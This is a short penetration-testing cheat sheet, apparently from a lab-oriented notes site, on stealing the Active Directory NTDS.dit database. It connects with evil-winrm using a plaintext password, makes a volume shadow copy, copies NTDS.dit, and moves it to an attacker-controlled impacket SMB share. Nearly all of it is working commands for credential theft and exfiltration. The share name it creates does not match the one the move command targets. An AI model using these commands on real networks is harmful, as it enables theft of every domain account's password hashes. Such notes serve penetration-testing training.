Copying NTDS.dit via evil-winrm

# Attacker Machine
./evil-winrm.rb -i 10.129.202.85 -u jmarston -p 'P@ssword!'

# Checking for local group membership
net localgroup

# Checking for the user privilege
net user jmarston

# Copying a drive when the AD is initially created
vssadmin CREATE SHADOW /For=C:

# Then do this
# First we make a directory in the C:\ named NTDS
mkdir NTDS
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

# Then before we will get the ntds.dit file 
# We have to create a directory in our attacker machine and open up a smbserver
mkdir TmpDirectory
sudo impacket-smbserver -smb2support NTDSFileShare TmpDirectory

# Then just move the file to attacker machine
cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

PreviouslaZagne.exe NextCopying Registry Hives with reg.exe

Last updated 1 year ago